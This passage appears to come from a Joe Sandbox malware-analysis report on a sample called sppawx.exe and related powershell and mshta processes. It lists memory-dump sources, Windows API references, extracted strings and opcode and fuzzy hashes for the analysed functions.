                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                              • Instruction ID: 9b0d6ec61e2f200a216c3a4e1c6f7b63006c807f338435d4fb72607c3c5f3780
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341E512E0E6824AFB74AB359401379F690EB80BA8FD4427DEE5C06ED5DE3CD441C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3290B6
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79A31CC15), ref: 00007FF79A3290D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-2372293429
                                                                                                                                                                                                                              • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                              • Instruction ID: f3b8e03180fc3f0568613b12359a417318771e9c3ad5632761333a91334faff2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A415B32A0AB1686FB64EF36A8810B8B794EB44790B95507DED4D43B85DE3CE481C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction ID: 56927b0d103b8bcfc167e0774e2848b129515644c4a115c5d3f743e5f2fec9f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED419322B19B8581EB609F35E8443A9B7A0FB98794F844039EE4D87B98EF3CD411C750
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                              • API String ID: 0-402823876
                                                                                                                                                                                                                              • Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                                                              • Instruction ID: 04823874bff97c0bbb29aae3ada4ebf782f2730f1cb1bf18b5838384d5e7b0e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65419F25A9964282EB45AB69D4517BD2291FF88BC4F8C4037DA4C46BF6EF3CE142C702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                                              • Instruction ID: 4e1fd81dc36432723768758053b2140e424b0c93bad1eb94ad0a12165e789b89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB21E163A0928182FB70AB31D04826DF3B1FB88B48FD5807DDA8D43694DF7CE9558B60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: b840087720e8b2518e63abfa82fb4efe4917aad8864f4536ad74be85905c2eba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44115B32A09B8182EB20DF25F400269B7E0FB88B84F984279EE8D07769DF3CD551CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: 661e98d332bd1102e4b862f825f9ff25bf39f272a3d811e7275bb2396d4bd79c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D017C22E1E20296F730BF70946627EB3A0EF85708FC0107EE95D86695DE2CE544CA24
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: if_nametoindex
                                                                                                                                                                                                                              • String ID: O&:if_nametoindex$no interface with this name
                                                                                                                                                                                                                              • API String ID: 3183282855-3835682882
                                                                                                                                                                                                                              • Opcode ID: 98493591a659af0213437e765703a3a556d57d58ca33cb4998051ffa7530dfdf
                                                                                                                                                                                                                              • Instruction ID: bd6cc63eb2fd8f5552009a8b7d866f645b2fbe6345b7887f7751c07233d3ec7f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98493591a659af0213437e765703a3a556d57d58ca33cb4998051ffa7530dfdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34011E75B08B43A5EB309F65E89417D63A0BFC8B69F580433D64E46A74EE3DE544C704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getprotobyname
                                                                                                                                                                                                                              • String ID: protocol not found$s:getprotobyname
                                                                                                                                                                                                                              • API String ID: 402843736-630402058
                                                                                                                                                                                                                              • Opcode ID: 2f70ce79659ed13e4342e0d9fb3f69ee9e36e101a059a86bd66953f75dec2b1e
                                                                                                                                                                                                                              • Instruction ID: 5ffc8869645fb6d2e62a794856b1dfb41c676ab0aea4a2079fc1e4f178803b02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f70ce79659ed13e4342e0d9fb3f69ee9e36e101a059a86bd66953f75dec2b1e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E501DA25A18B42E2DA349B22E95417D6361FBC9FA1F581432DA4E87F74FF2CE458C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_ntoa
                                                                                                                                                                                                                              • String ID: packed IP wrong length for inet_ntoa$y*:inet_ntoa
                                                                                                                                                                                                                              • API String ID: 1879540557-3027498899
                                                                                                                                                                                                                              • Opcode ID: 4b7a4f3c29876b6bee92d7c7859f4f750ad6f09b5005b8fdf6fed3d553e13eda
                                                                                                                                                                                                                              • Instruction ID: 70e588b610913337c01c2275e88fdd9ed57b02ede76b3a48dd85a9b1b134d4d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b7a4f3c29876b6bee92d7c7859f4f750ad6f09b5005b8fdf6fed3d553e13eda
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C301EC31B08B47A2EA309B25E8540AD6360FBC8B65F580137DA4E47A74EF3CE549CB11
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1434823807.00007FFE7B24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B24D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b24d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                              • Instruction ID: 4d9ffcedfb11d855366a1dfcb34dc869b8c70461350bff405abc2c8a3ea52123
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92014F3251CE08CF9AA8EF1EE48595237E0FB98320710065AD41DC766AD731F892CBC1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5bd09870f5ed876a56b22500aa4c3edc213cd72116ad46ecf824c3a61b1edc92
                                                                                                                                                                                                                              • Instruction ID: 23cad6a64da3e88e44b483a055d370bb9c7b90350e142d421611c5f6aeee8d31
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bd09870f5ed876a56b22500aa4c3edc213cd72116ad46ecf824c3a61b1edc92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC01677121CB0C4FD744EF0CE451AB5B7E0FB95364F10056EE59AC36A5DA36E882CB45
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e562ec9c8e582cba69c3990def1cbe30a1c42cd7d32edbcdde15974253f1f6ab
                                                                                                                                                                                                                              • Instruction ID: 6e4f88834080ba1550375979f1085ad115ab56121588566de3a480047d7ebf8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e562ec9c8e582cba69c3990def1cbe30a1c42cd7d32edbcdde15974253f1f6ab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F0813290D1854FD761EB2C98555E87BE0EF41324B1900FAD1A9DB07BEA2AAC94C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 585c14e1f96a6d39e336d62aee2d1c9d656b0fbe0a83fb1bf59339c45b1959fd
                                                                                                                                                                                                                              • Instruction ID: f642ef66cb45c381465faf36da2786a1cee73ecd4fdb932555a1001b69f7c900
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 585c14e1f96a6d39e336d62aee2d1c9d656b0fbe0a83fb1bf59339c45b1959fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0AF32A0C6868FE7A5EB1CA8414E877E0FF85324B1900FAD05DDB077EA2AAC45C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1436319253.00007FFE7B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B430000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b430000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ebdd1cb3c47917e0c8a7e465132b9531f06c37dcdc63a5a1a530d1f9fd3cf94c
                                                                                                                                                                                                                              • Instruction ID: 4c810ca157f473a62002cda414f00afcb7886f049c56fa4ef1268f6680a62de1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebdd1cb3c47917e0c8a7e465132b9531f06c37dcdc63a5a1a530d1f9fd3cf94c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F0ED32E0EB884FEB11EBA894445FCBBA0EF99720F1804BFD04DDA9A3D9290841C311
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: O_^6$O_^<$O_^F$O_^I$O_^J
                                                                                                                                                                                                                              • API String ID: 0-2439779554
                                                                                                                                                                                                                              • Opcode ID: ac180d0de7f6185abe8c3b5825832dd7e869bd7e30952a151ae460ba1a09475f
                                                                                                                                                                                                                              • Instruction ID: b278b55a5e67e9674ab2bf2f437d70041f6b86d57f4c88451c5ea287fc2a6ecb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac180d0de7f6185abe8c3b5825832dd7e869bd7e30952a151ae460ba1a09475f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 372132BF3194169EE20277AEB80A7DC7380EBD567734C01B3E25ECFA13D914648B8690
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1435489773.00007FFE7B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7B360000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ffe7b360000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: O_^$O_^$O_^$O_^
                                                                                                                                                                                                                              • API String ID: 0-934926442
                                                                                                                                                                                                                              • Opcode ID: 88df611da3a5fcf82004dce85af9a89647c19f96c2e1bdae79cea576b63877a1
                                                                                                                                                                                                                              • Instruction ID: 7c94deac07034b279dee072004665fd9eb93014cc2ad08477fb326f91a2d8ed5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88df611da3a5fcf82004dce85af9a89647c19f96c2e1bdae79cea576b63877a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA41D6B792D5C3ABF656421D889D0657BA4FF6532CB1802F7C8A98F0BFED8928874101
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000003.1375982325.0000020DD5980000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000020DD5980000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_3_20dd5980000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
                                                                                                                                                                                                                              • Instruction ID: 4ab4bfea3aa5805afdce446a72c6cbc2c4683e087183f88209dbfbbb07664a50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ba2e1a521016d2c7164f7fe7f35988dec8f75605b5d913d5f5949e93377af2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45B0120005F7C28ED70353B20C7A15D2F705E47104FCD49C28455D5097D00C0A8A5362
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
